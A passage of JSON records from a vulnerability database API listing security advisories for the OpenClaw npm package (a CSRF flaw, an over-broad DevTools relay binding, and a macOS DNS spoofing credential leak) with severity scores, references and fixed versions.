                            "scoring_elements": "0.04728",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41347"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mhr7-2xmv-4c4q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mhr7-2xmv-4c4q"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41347",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41347"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-cross-site-request-forgery-via-missing-browser-origin-validation-in-http-operator-endpoints",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-cross-site-request-forgery-via-missing-browser-origin-validation-in-http-operator-endpoints"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mhr7-2xmv-4c4q",
                    "reference_id": "GHSA-mhr7-2xmv-4c4q",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-mhr7-2xmv-4c4q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41347",
                "GHSA-mhr7-2xmv-4c4q"
            ],
            "risk_score": 3.2,
            "exploitability": "0.5",
            "weighted_severity": "6.4",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fekn-d6f3-xfa6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89523?format=api",
            "vulnerability_id": "VCID-fuda-zxu8-gbb4",
            "summary": "OpenClaw: Sandbox browser CDP relay could expose DevTools protocol on 0.0.0.0\n## Summary\n\nSandbox browser CDP relay could expose DevTools protocol on 0.0.0.0.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe sandbox browser CDP relay could bind too broadly, exposing Chrome DevTools Protocol access outside the intended local/sandbox source range.\n\n## Technical Details\n\nThe fix enforces CDP source-range restriction by default and avoids broad `0.0.0.0` exposure unless explicitly configured.\n\n## Fix\n\nThe issue was fixed in #61404. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `fbf11ebdb7110632f93926d0ac7b48f04cb44d77`\n- PR: #61404\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/fbf11ebdb7110632f93926d0ac7b48f04cb44d77",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/fbf11ebdb7110632f93926d0ac7b48f04cb44d77"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/61404",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/61404"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-525j-hqq2-66r4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-525j-hqq2-66r4"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-525j-hqq2-66r4",
                    "reference_id": "GHSA-525j-hqq2-66r4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-525j-hqq2-66r4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "GHSA-525j-hqq2-66r4"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fuda-zxu8-gbb4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89900?format=api",
            "vulnerability_id": "VCID-g3hg-peh1-tudm",
            "summary": "OpenClaw: macOS Tailnet DNS Spoofing & Credential Exfiltration\n## Summary\nmacOS Wide-Area Discovery Accepts Arbitrary Tailnet Peer as DNS Authority and Exfiltrates Operator Credentials\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped macOS discovery steering bug, but exploitation needs same-tailnet position, a CA-trusted endpoint, and user selection, so medium not high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a23c33a681f8c1b22dc793995acc4c5c4b568346` — 2026-03-31T10:04:11+01:00\n\nOpenClaw thanks @nexrin for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41393",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7e-05",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0069",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41393"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a23c33a681f8c1b22dc793995acc4c5c4b568346",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a23c33a681f8c1b22dc793995acc4c5c4b568346"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q9w8-cf67-r238",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q9w8-cf67-r238"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41393",
                    "reference_id": "CVE-2026-41393",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41393"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-q9w8-cf67-r238",
                    "reference_id": "GHSA-q9w8-cf67-r238",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-q9w8-cf67-r238"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery",
                    "reference_id": "openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
